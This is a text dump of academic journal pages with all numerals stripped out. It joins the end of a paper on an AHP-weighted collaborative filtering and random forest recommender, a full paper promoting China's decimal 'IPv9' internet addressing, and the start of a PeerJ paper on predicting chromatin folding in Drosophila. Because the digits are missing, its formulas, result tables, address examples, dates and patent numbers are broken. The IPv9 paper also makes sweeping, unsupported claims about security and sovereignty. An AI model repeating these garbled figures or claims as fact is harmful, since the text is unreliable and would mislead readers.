influencing factors in the analytic hierarchy process, and give corresponding weights to different operation behaviors, and then determine the similarity between different users and the similarity between different brands according to the obtained weights degree. the following is the specific process of calculating the weights: step : decision-level analysis. first of all, through in-depth study of the problem, in the research process, the factors that have related relationships are analyzed and compared with each other, and each factor is arranged in layers to form a multi-layered hierarchical structure model. through the analysis, we can know that the following four factors have the most impact on the user's future purchases: the number of user clicks on the product, whether the user has added the product to the shopping cart, whether the user has collected the product, and whether the user has purchased the product. formed a structural model as shown below: figure . hierarchical model diagram step : construct the judgment matrix. first of all, it is necessary to compare all the influencing factors with each other. in the measurement, the introduction of relative scale is used to reduce the difficulty of comparing two different factors with each other, which further improves the accuracy. if you want to compare the influence of n elements a , a , … , an on the same goal, you will obtain two factors aiand aj each time. cij represents the ratio of the influence level of ai and aj on the goal. all the comparison results are also can be written as a comparison matrix: c = (cij)n ∗ n,cij > ,cij = cij ( ) international journal of advanced network, monitoring and controls volume , no. , the larger the value of cij , the higher the importance of ai relative to aj . in general, the differences between these factors are presented on a scale of - . step : solve and test. the elements of w are the ranking weights of the relative importance of the factors at the same level to the factors at the previous level. this process is called hierarchical single sorting. then, whether the hierarchical single sorting can be confirmed requires a consistency test. the so-called consistency test is refers to the allowed range of inconsistency determined by the pairwise comparison matrix. the consistency index can be defined as: ci = λmax −n n− . different ci values represent different meanings, the greater the ci, the more serious and obvious the inconsistency, the consistency ratio is defined as cr = ci ri . ri is defined as a random consistency indicator, its value is shown in the table below: table i. ri value table c. improved collaborative filtering algorithm because random forest also has its own drawbacks, it can only recommend brands that have been in contact with users, and those brands that have not been in contact with users, random forest will not recommend it. even the brand may meet the needs of users. at this time, ahp improved collaborative filtering algorithm is proposed to solve this problem [ ]. improve through the following steps. step : use the ahp model to find the weight of user behavior. because when calculating user similarity and brand similarity, collaborative filtering recommendation algorithm cannot treat all user interactions equally. therefore, the ahp model is used to assign values to the behaviors of users. with this set of weights, the similarity between the user's image and the brand's image can be calculated, which solves the drawback of collaborative filtering recommendation. this set of weights can be trained using the ahp analysis model introduced in the previous section. step : the user's rating data for the brand. the operation of scoring products on the e-commerce website, and the size of the rating also represents the user's love for the brand, therefore, before calculating the user's similarity and brand's similarity, you first need to calculate the user's rating value for the brand. you can obtain the user's rating value for the brand by calculating the user operation type and frequency. the calculation formula is as follows: ru,i = ∑ op(c)fp(c) c c= ( ) among them, u represents the user, i represents the brand, then ru,irepresents the user's rating of the brand, op(c) represents the weight of the user's operation type c , and fp(c) represents the user the frequency of operations on the brand. from this we can get the matrix that ru,i can be composed of: [ r r … r n r r … r n … … … … rm rm … rmn ]. this is a matrix reflecting u and i interacting with each other. based on these, the similarity between users and brands can be calculated. step : calculation of similarity. this is the most important link in the collaborative filtering recommendation algorithm. this article uses an attribute-based similarity algorithm. the similarity is to process the information of the user and its nearest neighbors, so the core part of the algorithm is that if the nearest neighbor is obtained, we conduct relevant research and analysis on it, and obtain the following method of the user's comprehensive similarity. the following is the formula for the user's rating similarity ysd (u,i): ysd = ∑ (ru,t−au)∗(ri,t−ai)t∈iu,i √∑ (ru,t−au)t∈iu ∗∑ (ri,t−ai) t∈ii ( ) this formula compares the similarity of users u and i. ru,t andri,teach represent the rating value of users u and i on brand t, and the set of brands that user u has rated respectively represent for iu. similarly, all brands rated by user i. are denoted as ii, and the intersection of those users who have shared a rating is iu,i ; the average value of user u's rating in iu is set to au , similarly, in ii the average value of user i score is set to ai. the following formula represents the user's feature similarity ysd algorithm: international journal of advanced network, monitoring and controls volume , no. , d(u, i) = √∑ (uk − ik) n k= ( ) ysd (u, i) = +d(u,i) ( ) formula shows the weighted euclidean metric of users u and i, that is, the euclidean distance, n represents the feature dimension of the user, and the k- th eigenvalues of users u and i will be represented by uk and ik, respectively. ysd illustrates the calculated similarity of features of users u and i. based on the above calculation formula to obtain the user's similarity score ysd for the product and the user characteristic similarity ysd , the following formula is used to calculate the user's comprehensive similarity ysd: ysd(u, i) = w ∗ ysd (u, i) + ( − w ) ∗ ysd (u, ) ( ) in these indicators, w is the combined weight of the user's comprehensive similarity. the actual value of the combined weight of the user's comprehensive similarity is determined by the degree of influence of the score similarity and the feature similarity on the user's comprehensive similarity. the calculation of brand similarity is the same as the calculation of user similarity. you only need to change the parameters, which will not be described in detail here. step : the selection of the nearest neighbor. in order to achieve the purpose of accurate recommendation, it is necessary to accurately target the other neighbor users that match the user's interests, so the selection of the nearest neighbor is very important. select the user's nearest neighbor and the brand's nearest neighbor, this article uses the top-n method. the first step of this method is to calculate the similarity between other users, brands and target users, brands, and then sort the calculated similarity values. step : generate recommendations. using the method described in step , we can obtain the nearest neighbor set nu[u] of the target user, and then we recommend the user according to the formula listed below: pu(t, u) = au + ∑ (ri,t−ai)∗ysd(u,i) c i= ∑ ysd(u,i)ci= ( ) au is the average score of user u for all brands in the dataset, the value of c is the number of users in the nearest neighbor of user u., ri,t is the nearest neighbor user i. of user u, for the rating made by the brand t, ysd(u, i) represents the user's overall similarity. pu means that the recommendation degree of this brand is recommended to the user u based on the result of the user recommendation. the brand-based recommendation idea is similar to the above, so i won’t elaborate more. d. fusion of the two algorithms after introducing the basic characteristics of the random forest recommendation algorithm and the collaborative filtering recommendation algorithm, the parameters and the calculation process required, we use the characteristics of each other. for example, the random forest model can recommend brands that users have interacted with before, while the collaborative filtering algorithm recommends brands that have not interacted with users. therefore, if the two models can be perfectly combined, the common advantages of the two algorithms can be combined, which plays a role in promoting strengths and avoiding weaknesses. all the information required for user recommendation can be included. naturally, better recommendation results will be obtained. the model the accuracy is also more improved, as shown in detail in figure describes the fusion strategy of the two models: figure . schematic diagram of algorithm fusion process iv. experiment and result analysis a. experimental data and experimental environment in order to verify the efficiency of the improved algorithm model, we selected an e-commerce company's internal data set for testing, and analyzed and evaluated its performance. the data set contains all the behaviors of about , random users with behaviors within one week of the e-commerce company. among them, user behaviors include clicks, purchases, favorites, and purchases. the data set contains users , the number of goods , the number of all actions , such a huge data set, if international journal of advanced network, monitoring and controls volume , no. , you use traditional stand-alone operations, the time consumption is immeasurable, so using the hadoop distributed system in a big data environment to perform distributed calculations on its data greatly improves the efficiency of the operation. the experimental operating environment is a hadoop cluster. the cluster has one master node and three slave nodes, and all machines in the cluster have the same configuration. the cluster installation is configured under the centos- . operating system, and the jdk . environment is configured for both centos and windows, and the code is compiled into the idea compiler on the windows side. b. algorithm evaluation index ) recall rate the number of items in the recommended list calculated by the algorithm is what consumers like, which is the recall rate of the algorithm. formula describes how to calculate the recall rate: r(lu) = lu∩bu bu ( ) among them, the item that user u likes is lu, and the recommendation algorithm lists the product recommended by the consumer as bu. ) accuracy the accuracy of the algorithm tests the ratio of the items in the recommended list given by the system to the items that consumers actually like. formula describes how to calculate the accuracy: p(lu) = lu∩bu lu ( ) among them, the item that user u likes is lu, and the recommendation algorithm is denoted as bu by the consumer's recommended product list. ) f measure as shown in formula : f = ∗p∗r p+r ( ) since there is a negative correlation between the accuracy rate and the recall rate, it is necessary to fit the f measure, and the f score will prevail. as can be seen from the formula , the prediction result hopes to cover more users and brands while ensuring accuracy. c. random forest model experiment results there are two parameters that can be controlled by the random forest model, one is the number of random forest decision trees, and the other is the number of feature attributes that are randomly extracted to build the decision tree. the number of decision trees in the random forest model is krf , and the selected parameters are krf= , , , , , , , , , , and the following experimental results can be obtained: figure . the relationship between decision tree and result in random forest model it can be seen from the experimental result graph that the f value rises with the increase of the decision tree. after rising to , it basically tends to be gentle, so krf is taken as . also for the eigenvalues of random forests, not as many as possible, in order to ensure the stability of the model, through experiments, the following results are obtained: figure . the relationship between the number of features and the results in the random forest model international journal of advanced network, monitoring and controls volume , no. , it can be seen from the above experiment that when the number of decision trees is and the number of features is , the random forest model has the best effect, that is, the f value is the highest. the final experimental results of the random forest model are shown in the table below. table ii. random forest model final experimental results accuracy recall rate f measure . . . d. experimental results of the hybrid algorithm the weight of user behavior in the improved collaborative filtering algorithm can be calculated according to ahp, as shown in the following table: table iii. user behavior weight interaction type weight click . collection . add to cart . buy . the number n of brands recommended by the collaborative filtering algorithm is used as the parameter for the experiment. we take n = , , , , , and to conduct the experiment. the experimental results are shown in the figure. figure . the relationship between the recommended number of collaborative filtering algorithms and the result it can be seen from the experimental results that with the increase in the number of recommendations, the algorithm's recommendation performance is improving. when the number of brand recommendations is close to , the recommendation effect is the best. the final experimental results of the fusion of the final collaborative filtering recommendation algorithm and the random forest algorithm are shown in the following table: table iv. experimental results of fusion algorithm accuracy recall rate f measure . . . due to the large number of data sets in this experiment and the time-consuming operation in a single machine, the above operations are performed under the distributed system hadoop. in order to compare the advantages of hadoop in data processing speed, the collaborative filtering and the design the algorithm and the processing time of the algorithm designed in this paper are compared in the hadoop environment, as shown below: figure . time comparison chart because the algorithm in this paper is more accurate than the traditional collaborative filtering algorithm and the calculation is relatively complicated, the time efficiency is slightly insufficient. however, if it is run in a hadoop distributed cluster environment, the time efficiency is effectively improved by nearly times. it can be seen that the current big data in a large environment, it is necessary to use hadoop distributed clusters to process data. v. conclusion this paper attempts a model that uses different prediction and recommendation methods for prediction and recommendation, namely the random forest model, and gives a detailed introduction and further analysis of this model. this article also gives a detailed international journal of advanced network, monitoring and controls volume , no. , introduction to the basic principles of the traditional filtering algorithm of collaborative filtering, and thoroughly analyzes the advantages and disadvantages of the algorithm. for example, this traditional collaborative filtering algorithm lacks the ability to calculate the brand score of users. personalized investigation, treat all user behavior as the same. in view of the limitation of this traditional algorithm, this paper made some necessary improvements, and proposed the optimization of collaborative filtering similarity based on the weight of ahp. in addition, from two perspectives, user interaction and brand interaction, this article randomly integrates the collaborative filtering model with the random forest model. this will result in more accurate recommendation results, and the recall rate will naturally increase. finally, the data is analyzed through real data cases to obtain reliable experimental results. the results show that the combination of this analytic hierarchy process and collaborative filtering algorithm makes the recommendation performance better than a single collaborative filtering algorithm. and after being fused with the random forest model, compared with the single random forest algorithm or collaborative filtering algorithm, the performance has been greatly improved. references [ ] lu xiaocui. the application of big data analysis technology in cross- border e-commerce[j]. electronic technology and software engineering, ( ): - . [ ] tian bin. big data machine learning under the framework of distributed computing[j]. electronic technology and software engineering, ( ): - . [ ] yang wu, tang rui, lu ling. news recommendation method combining content-based recommendation and collaborative filtering[j]. computer applications, , ( ): - . [ ] yang hailong. power recommendation system based on item-based collaborative filtering algorithm[d]. lanzhou jiaotong university, . [ ] sheng wenshun, sun yanwen. an improved id decision algorithm and its application[j]. computer and digital engineering, , ( ): - + . [ ] wang jingna. research on used car valuation model based on random forest algorithm[d]. beijing jiaotong university, . [ ] cui yan, qi wei, pang hailong, zhao hui. a recommendation algorithm combining collaborative filtering and xgboost[j]. computer application research, , ( ): - . international journal of advanced network, monitoring and controls volume , no. , research on the technology of assign ip address to the connected computer based ipv wang hui school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com liu lingwen shandong radio, television and network co. ltd. tai'an branch e-mail: @ .com yu zhikai , chinese decimal network working group, shanghai, china shanghai decimal system network information technology ltd. e-mail: viktoryuzk@ .com li ming , chinese decimal network working group, shanghai, china shanghai decimal system network information technology ltd. e-mail: minxiaoli @ .com abstract—with the widely application of internet and the distribution is not reasonable in the beginning, the ipv address space is becoming less and less and there are fewer available ip addresses, in order to expand the address space, ipv was appeared, but it did not consider the network security in the first designing and have some shortcomings, it has not widely used in the world in its years. letf proposed some basic dreams of ipv in , and looked forward to the idea of network in the st century. however, due to the lack of research results of basic theories, technical problems of address exhaustion and layering, and development costs and other factors, it failed publicly. the ipv working group was disbanded in . on the basis of previous studies, chinese scholar and research team proposed a new internet architecture by using the decimal system (or the whole digital code) to assign ip addresses to the connected computers. this paper will research on the countless address of the new generation internet - ipv , and describe the characteristics of the new technology keywords-internet; ipv ; representation; characteristics i. the emergence of the new generation of the internet ipv is the most widely used protocol on the internet, and its address space is . in the early stage of the internet, due to the underestimation of the development trend of the internet, ip allocation was unreasonable, and ip resources were very limited. by , there was no address that could be allocated. in order to solve the problem of insufficient addresses, researches proposed ipv , ipv has addresses in theory, however, only one-eighth of the addresses can actually be allocated to end users. that is, the number of addresses that can be actually allocated is only , which is equivalent to . at present, barcodes are already having bits, and it cannot be covered, so ipv have some considerable limitations. in , chinese researcher proposed ipv — a method of using whole digital code to assign address for computer. in order to distinguish from ipv and doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ipv in the united states, the v in ipv proposed by china is uppercase, not lowercase. the patent for ipv includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design. these technologies constitute the core technology system at the bottom of the new generation ip network. the new network framework designed on this basis can form a network system that is connected and compatible with existing networks (internet using ipv and ipv technologies). ipv is not a simple upgrade of ipv and ipv , and its number of addresses is . the massive address of ipv can meet the needs of domain name address resources for human activities in years, and it is the simplest domain name address system. in , the authoritative professional institutions of the us government have confirmed legally and technically that china has the core technology of sovereign network with independent intellectual property rights under the ip framework. this is the patented technology of ipv which is different from the existing technology of the us internet. the official patent name is "method of using whole digital code to assign address for computer". the ipv protocol uses - arabic digital network as the virtual ip address and uses decimal as the text representation method, which is a convenient way to find online users. ipv has a large number of assignable ip addresses, and the maximum number of address bits is × . in order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. at the same time, ipv is also called "new generation security and reliable information integrated network protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. ipv obtained chinese patent in (cn ), and has obtained authorized patents successively in more than ten countries and regions, including south africa, turkey, kazakhstan, russia, south korea, north korea, hong kong, canada, singapore, australia, mexico and norway. ipv applied for us patent in . it was issued seven times of "non-final rejection opinion" and six final rejections by the us patent office. during this period, it was repeatedly criticized by senior members of the us ietf and famous american it companies. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". ii. text representation of the ipv address the paper developed a representation of the ipv address, including the "parenthesis" notation, the "bracket" decimal representation, and the "brace" decimal notation. a. the parentheses notation since the default length of the ipv address is bits, there are still many bits in each segment, whether it is or segments. for example, when using segments, each segment still has bits. this will result in the following situation in one segment: ……] ]…… ……] ]…… such a situation not only makes the input cumbersome, but also tends to have fewer or more bits, which makes the user inconvenient because of dazzling. for convenience, the expression "parentheses"—— (k/l) has been introduced. where "k" represents international journal of advanced network, monitoring and controls volume , no. , or , and "l" represents the number of or . so the above two examples can be abbreviated as: ……]( / ) ]…… ……] ( / )]…… b. the bracket decimal representation ) representation of different digits of ipv address a) bits are represented by "[ ]". bits in "[ ]" are expressed in decimal, and the length can be indefinite. the "[]" can be omitted when writing in the browser. the representation of the -bit ipv address is "y[y[y[y[y[y[y[y ", each y in the address represents bits and can be expressed in decimal, which is = , so every y is a -digit decimal number. although the range of digits in decimal is ~ , it is stipulated in the paper that the range of the first digit from the left of y can only be ~ , so that no overflow occurs. an example of this method is as follows: [ [ [ [ [ [ [ in the address representation, multiple consecutive zeros on the left of each decimal number can be omitted, but the all-zero decimal number needs to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ to further simplify the representation of the address, a consecutive all-zero fields in the address can be replaced with a square bracket [x] (x is the number of segments of the all-zero field). for example, the above address can be abbreviated as: [ [ ][ [ another example: [ [ [ [ [ [ [ ,can be abbreviated as [ ] [ [ [ [ [ [ [ ,can be abbreviated as [ ] ) type of ipv address there are five types of ipv addresses, which are described below. a) full ipv address the full ipv address is the form: y[y[y[y[y[y[y[y, where y represents a decimal integer from to = . b) ipv address compatible with ipv the form of this address is: y[y[y[y[y[y[y[d.d.d.d, where y represents a decimal integer from to = . d represents a decimal integer between and in the ipv . c) ipv address compatible with ipv the form of this address is: y[y[y[y[x:x:x:x:x:x:x:x, where y represents a decimal integer from to = . x represents a hexadecimal number from to ffff in the ipv . d) special compatible address in order to upgrade from ipv and ipv to ipv smoothly, some compatible addresses are designed in this paper. among them, some of the ipv addresses are compatible addresses designed to be compatible with ipv addresses. in order to transition these addresses to ipv addresses smoothly, special treatment has been done in this paper: add the appropriate prefix before this part of the address. in order to make their representations more intuitive and avoid errors caused by negligence in writing, a shorthand approach was introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each y represents an address of bits and is expressed in decimal. each x represents a -bit ipv address, expressed in hexadecimal. each d represents an -bit ipv address, expressed in decimal. for example: international journal of advanced network, monitoring and controls volume , no. , [ [ [ [ [ [ [ it can be written into: [ [ [ [e : b: : f d:d : : . . . or:[ ]e : b: : f d:d : : . . . for another example: [ [ [ [ [ [ [ it can be written as: :: . . . . "::" is a representation of the compressed form in an ipv address, and a single contiguous sequence of multiple blocks is represented by a double colon symbol "::". the decimal number is expressed in dotted decimal notation as . . . . e) full decimal address in order to facilitate the application of the logistics code and the full decimal address, it is recommended to use the category number , in the th power of , according to the application, it is necessary to adopt a fixed length non-positioning method. f) full decimal address ipv is compatible with the internet of ipv and ipv technology protocols, but ipv and ipv technology protocols cannot be backward compatible with ipv . the concept of compatibility is parallel coexistence, which is a gradual and modest transfer of applications and data services, rather than directly replacing or replacing existing protocols. in order to solve the problem of transition from ipv to ipv smoothly, up to now, a lot of money has been invested in the internet, and the transition address of ipv has been specially designed. a segment of the address is taken from the ipv address space, and about are allocated to allocate ipv . a small number of changes can be made on the current system to achieve the above objectives, in which ipv has a section of j.j.j.j., each j represents a decimal number, from to , that is ~ . among them, the previous [ ] can be omitted in the middle of the local address, that is, the local user (or designated user) can be directly used by j.j.j.j., and is distinguished from the ipv d.d.d.d. in order to transition to full decimal smoothly, you can assign decimals to these users at the same time, so that you don't have to re-address when you improve software and hardware in the future. for example, [ ] can be written as [ ] . . . . in a local domain ip network, you can write with . . . directly, so that the original terminal can be used. in order for the original user to be compatible with the current user, there should be a new record in the ipv dns record. any system that uses a transitional ipv address can use the original ipv system with appropriate modifications. at the same time, the header uses the ipv header, but the version number is , to distinguish the original ipv . however, the user terminal in the local domain can use the original terminal device.  when the category number is , the address length is bits, and the physical address of ipv will be discarded, and the -bit address of the ipv host will be used. the representation method is in decimal or - . - in dotted decimal notation, which is the same as hexadecimal ff.ff;  when the category number is , the address length is bits, indicating that the method is decimal - , and the corresponding character length or dotted decimal - . - . - . - , and hexadecimal ff.ff. ff.ff has the same effect;  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length;  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address international journal of advanced network, monitoring and controls volume , no. , length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length has no fixed length, indicating that the method is a decimal length or a corresponding character length. c. braces decimal this method represents a -bit address divided into four -bit decimal numbers and the braces separating them. this method first divides the -bit address into four -bit decimal numbers and the braces separating them, and then represents them. the form of the representation is "z}z}z}z". each z represents the address as a -bit portion and is represented in decimal. it is used in exactly the same way as y, and is compatible with y, and can be mixed. this greatly facilitates the compatibility of these ipv addresses in ipv . for example: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; especially the last address format is most useful. for example: the address } } } ] . . . it can be expressed like this: { } ] . . . finally, it should be noted that the use of square brackets and braces in the symbolic representation is not affected. that is, no distinction between "{" and "}", "[" and "]". this definition is taken in view of the fact that this does not cause any side effects and is more user-friendly. d. text representation of the address prefix the scheme of ipv address is similar to the schemes of ipv super net and cidr (classless addressing), which use an address prefix to represent the network hierarchy. on the representation of the ipv address prefix, a representation similar to cidr is used, which has the following form: ipv address / address prefix length the address of ipv is an address written by the ipv address notation. the length of the address prefix is the length of consecutive bits indicating the address prefix from the left in the address. it must be noted that the decimal number is used in the ipv address, but the prefix length refers to the binary. therefore, you must calculate the prefix carefully. however, it is not intuitive in binary numbers. after analysis, it is easier to understand that the ipv address prefix is converted to hexadecimal. however, the ipv address is still a decimal number. for example: the address prefix of bits is [ [ [ [ [ [ , which can also be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ [ / or [ [ [ [ [ [ ]/ or [ ] [ [ ]/ it should be noted that in the representation of the address prefix, the representation of the ipv address portion must be legal, that is, the ipv address to the left of the slash "/" must be restored to the correct address. international journal of advanced network, monitoring and controls volume , no. , in this address prefix, you can see that the length of the address prefix is . therefore, the prefix is actually the first segments of the entire address plus the first bits of the seventh segment ( × + = ). so the seventh segment of the address is the most critical. this paragraph is expressed in hexadecimal as: ********. since a hexadecimal digit is equal to bits, the prefix only includes the first two *. knowing this, you can know that the value of this paragraph is included in (hex) ~ ffffff (hex), which can also be expressed in decimal as ~ . alternatively, this paragraph is expressed in binary as: **** **** **** **** **** **** **** ****. because in the binary, one bit occupies bit, the prefix includes the first *, and the range of the value of this segment is ~ , which can also be expressed in decimal as ~ . the ipv address can be generated by padding to the right of the address prefix, which can also be a real ipv address containing the address prefix. for example, the address prefix in the above example can also be expressed as: [ ] [ [a[b/ where, a is an arbitrary decimal number in the range of ~ , and b is an arbitrary decimal number in the range of ~ . iii. features of ipv the intellectual property of decimal network/digital domain names, including copyrights such as《overall allocation method for allocating computer addresses with all-decimal algorithms for networked computers》 (licensed in china in ), 《ipv /future network root domain name server》 and 《chn national top level domain server》. in addition, it also includes the chinese patent license "method for allocating addresses to computers using internet with full digital code" (obtained in ). these constitute the independent innovation of the complete system of ipv , including the address space of the decimal network, root name servers, national and regional top-level domain servers. in accordance with the universal postal rules, which are jointly participated by sovereign states under the un framework. the ipv network communication rules, which are protected by chinese laws and protected by us laws and protected by multinational laws, clearly belong to the public network communication system that is jointly observed by the international community. any country that respects china's intellectual property rights and the rights of its owners in accordance with the law can use china's ipv decimal network/digital domain name network communication rules to build an autonomous and controllable network communication system. at the iso/iec future network international conference, mr. xie jianping announced that china's ipv is the common wealth of all mankind and won warm applause from the participants. he won the unanimous vote of the members of the united states, russia, canada and other countries. the conclusions of china's ipv 's independent innovation ideas and practice verification have been written into the iso/iec, "name and addressing" and "security" in the "representation and requirements for future network problems" officially released in . china's ipv has significant features which are described below. ) china's ipv can be compatible with ipv and ipv , and solves the problem of high cost and repeated investment construction caused by ipv not being compatible with ipv . in addition, ipv provides a reliable way for applications (users and services) to transition securely, quickly and smoothly to the ipv system platform. at the same time, the system is still safe and effective in the face of any cyber attacks that may occur at any time. international journal of advanced network, monitoring and controls volume , no. , ) china fully controls all the hardware and software of china's ipv system, including the allocation, management and resolution services of all root domain names including the parent root domain, the primary root domain, the child root domain and the dependent root domain. other countries can't get involved in the illegal control of ipv . it is impossible theoretically to implement network monitoring, modify the system communication routing table, and close the network address switch arbitrarily. moreover, it is difficult to achieve from a technical point of view. the ipv designed in the paper can enable countries to achieve autonomous control of the root domain name server, which has geographical locations. ipv can realize end-to-end direct communication services, can independently build, develop and manage the technical system of domestic cyberspace, and allow countries to cooperate equally and jointly manage the global root domain name resolution system. it is possible to guide and establish a new pattern of the global sovereignty community of destiny. under the guarantee of the new technical system of ipv , the realization of future network interconnection, intercommunication, co-management and co-governance between countries has been presented to the sovereign countries of the united nations. ) china's ipv can determine the level of security, the safety factor, and the power distribution and means of security control. it is fundamentally "not subject to others." ipv treats rfid code as an ip address and allows access to the internet directly, and ensures that it can be exchanged and resolved autonomously in the nearest place in the country. ipv can effectively prevent data from being "forwarded" by the "routing" information of the internet, avoiding data being forwarded globally by the exchange command of the internet, and avoiding data being monitored and copied by the internet network image. it can save a lot of energy and overhead, so ipv is both environmentally friendly and safe. any user who applies for and is allowed to own the unique domain name and address of china ipv can enter the ipv network system of china and enjoy the service at the same time, and is protected by the real “real name” of the system. if there is any misconduct or unforeseen circumstances, you can always trace the traces, trace the certification, and lock the evidence so that the "black hand" has nowhere to hide and escape. ) china's ipv start address is bit, and can manage bit address. it can be compressed and recycled on both sides. it can be fixed and not positioned like a telephone system to reduce and save unnecessary overhead costs, increase efficiency. it fully meets the needs of political, business, production, learning, and research users in the field of network science for a long period of time. therefore, it can fully meet the needs of the political, business, production, learning and research users of the future network in the scientific field for a long time. because of this, the computer's networking scale can be set as needed, and can be widely used in space communications, nano computers, human cells or dna computer systems. ipv not only goes far beyond the ietf's vision in rfc , rfc , but also has great advantages compared to ipv . ipv has a bit address, but it can only be unilaterally compressed, not recyclable, and the address is fixed and positioned, the overhead is large, the efficiency is impaired, and the actual address allocation rate is only . - . %. ) china's ipv has the basic conditions that must be met by the future network as determined by the iso/iec international organization for standardization. that is: the basic technical characteristics of the sovereign network; the design flaws and technical disadvantages of the existing networks, including the internet; and the network is obviously superior to the existing network in terms of controllability, credibility, security and reliability. international journal of advanced network, monitoring and controls volume , no. , due to the urgent need for network sovereignty, security and response to emergencies, on the basis of ipv , ipv internet, private network, and local area network, the paper proposes that we should boldly try and build ipv network with lower investment. after a period of time, users, applications and services on the existing network can be smoothly migrated to china's ipv system, which fundamentally forms the basic protection against attack and anti-virus, and establishes a solid foundation for the transition to a future independent and reliable network. iv. conclusion the key technologies of the new generation (ipv ) internet were introduced in this paper. the text representation of the ipv address includes expressions such as "parenthesis" notation, the "bracket" decimal representation and the "braces" decimal representation. the technology is compatible with ipv and ipv , and provides a reliable way to transit to the ipv system platform securely and quickly and smoothly based on ipv and ipv . acknowledgment pre-research project of th five-year equipment development( ). the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ) reference [ ] mou chengjin. accelerate the construction of china's independent and controllable system of network security [j]. world socialism studies, , ( ): - + . [ ] he jinsong, peng zhichao, he wenhua, jiang xuejun. comparative study of ipv , ipv and ipv [j].software engineering, , ( ): - . [ ] zhu lin. design and implementation intelligent theater based on ipv and nb-iot [d]. beijing university of posts and communications, . [ ] zhang zheqing. experiment and application research super wifi with ipv [d]. beijing university of posts and communications, . [ ] ding songbo, chen jinying, he kai. research on the application and development prospect of ipv [j]. communication & information technology, ( ): - + . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group.internet protocol, version (ipv )-specification, rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xudongmei, etc. digital domain name specification.sj/t - , . . [ ] information technology-future network-problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] information technology-future network-problem statement and requirement-part : security, iso/iec dtr - , , . submitted august accepted september published november corresponding authors michal b. rozenwald, mbrozenvald@edu.hse.ru, michal.rozenwald@gmail.com mikhail s. gelfand, m.gelfand@skoltech.ru, michal.rozenwald@gmail.com academic editor alexander bolshoy additional information and declarations can be found on page doi . /peerj-cs. copyright rozenwald et al. distributed under creative commons cc-by . open access a machine learning framework for the prediction of chromatin folding in drosophila using epigenetic features michal b. rozenwald , aleksandra a. galitsyna , grigory v. sapunov , , ekaterina e. khrameeva and mikhail s. gelfand , faculty of computer science, national research university higher school of economics, moscow, russia skolkovo institute of science and technology, moscow, russia intento, inc., berkeley, ca, usa a.a. kharkevich institute for information transmission problems, ras, moscow, russia abstract technological advances have lead to the creation of large epigenetic datasets, including information about dna binding proteins and dna spatial structure. hi-c experiments have revealed that chromosomes are subdivided into sets of self-interacting domains called topologically associating domains (tads). tads are involved in the regulation of gene expression activity, but the mechanisms of their formation are not yet fully understood. here, we focus on machine learning methods to characterize dna folding patterns in drosophila based on chromatin marks across three cell lines. we present linear regression models with four types of regularization, gradient boosting, and recurrent neural networks (rnn) as tools to study chromatin folding characteristics associated with tads given epigenetic chromatin immunoprecipitation data. the bidirectional long short-term memory rnn architecture produced the best prediction scores and identified biologically relevant features. distribution of protein chriz (chromator) and histone modification h k me were selected as the most informative features for the prediction of tads characteristics. this approach may be adapted to any similar biological dataset of chromatin features across various cell lines and species. the code for the implemented pipeline, hi-chip-ml, is publicly available: https://github.com/michalrozenwald/hi-chip-ml subjects bioinformatics, computational biology, molecular biology, data mining and machine learning, data science keywords topologically associating domains (tads), recurrent neural networks (rnn), hi-c experiments, linear regression, gradient boosting, chromatin, dna folding patterns, machine learning introduction machine learning has proved to be an essential tool for studies in the molecular biology of the eukaryotic cell, in particular, the process of gene regulation (eraslan et al., ; zeng, wang & jiang, ). gene regulation of higher eukaryotes is orchestrated by two primary interconnected mechanisms, the binding of regulatory factors to the promoters and enhancers, and the changes in dna spatial folding. the resulting binding patterns and chromatin structure represent the epigenetic state of the cells. they can be assayed how to cite this article rozenwald mb, galitsyna aa, sapunov gv, khrameeva ee, gelfand ms. . a machine learning framework for the prediction of chromatin folding in drosophila using epigenetic features. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:mbrozenvald@edu.hse.ru mailto:michal.rozenwald@gmail.com mailto:m.gelfand@skoltech.ru mailto:michal.rozenwald@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/michalrozenwald/hi-chip-ml http://doi.org/ . /peerj-cs. by high-throughput techniques, such as chromatin immunoprecipitation (ren et al., ; johnson et al., ) and hi-c (lieberman-aiden et al., ). the epigenetic state is tightly connected with inheritance and disease (lupiáñez, spielmann & mundlos, ; yuan et al., ; trieu, martinez-fundichely & khurana, ). for instance, disruption of chromosomal topology in humans affects gliomagenesis and limb malformations (krijger & de laat, ). however, the details of underlying processes are yet to be understood. the study of hi-c maps of genomic interactions revealed the structural and regulatory units of eukaryotic genome, topologically associating domains, or tads. tads represent self-interacting regions of dna with well-defined boundaries that insulate the tad from interactions with adjacent regions (lieberman-aiden et al., ; dixon et al., 